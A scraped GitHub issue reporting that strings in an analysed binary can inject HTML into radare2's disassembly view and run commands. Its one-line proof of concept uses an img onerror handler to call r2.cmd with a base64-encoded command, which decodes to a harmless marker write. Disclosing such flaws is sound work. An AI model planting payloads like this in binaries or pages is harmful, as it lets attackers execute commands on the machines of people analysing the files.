We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Again, this leads to arbitrary command execution. PoC
void main() { printf("<img src=k onerror=r2.cmd(atob('ZWNobyAxID4gL3RtcC9ib28='))></img>"); }
Edit: To clarify, this occurs when the string from the binary is show in the disassembly window.
radareorg/radare2#4337
The text was updated successfully, but these errors were encountered:
been looking for this in the web-ui and didn't found it. AFAIK this code is in r2, not in the webui.
if i'm wrong, please somebody tells me where is this code.
Sorry, something went wrong.
wat
please @Maijin elaborate on this and provide a proper testcase
I have no idea what this is about, I just ripped of the issue from radare2 repo
No branches or pull requests
Again, this leads to arbitrary command execution.
PoC
Edit:
To clarify, this occurs when the string from the binary is show in the disassembly window.
radareorg/radare2#4337
The text was updated successfully, but these errors were encountered: